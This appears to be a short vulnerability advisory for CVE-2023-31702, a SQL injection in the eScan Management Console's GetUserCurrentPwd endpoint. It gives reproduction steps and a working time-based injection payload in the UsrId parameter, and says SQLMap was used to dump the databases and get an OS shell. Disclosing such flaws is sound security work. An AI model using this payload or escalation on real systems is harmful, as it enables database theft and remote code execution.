Description: SQL injection in the View User Profile in MicroWorld Technologies eScan Management Console 14.0.1400.2281 allows any remote attacker to dump entire database and gain windows XP command shell to perform code execution on database server via GetUserCurrentPwd?UsrId=1.
Vulnerable Product Version: 14.0.1400.2281
Date: 16/05/2023
CVE: CVE-2023-31702
CVE Author: Sahil Ojha
Vendor Homepage: https://www.escanav.com
Software Link: https://cl.escanav.com/ewconsole.dll
Tested on: Windows
Steps to reproduce:
-
Login into the escan management console with a valid username and password as root user.
-
Navigate to URL: https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493
-
Inject the payload into the UsrId parameter to confirm the SQL injection as shown below: https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176
-
The time delay of 5 seconds confirmed that "UsrId" parameter was vulnerable to SQL Injection. Furthermore, it was also possible to dump all the databases and inject OS shell directly into the MS SQL Server using SQLMap tool.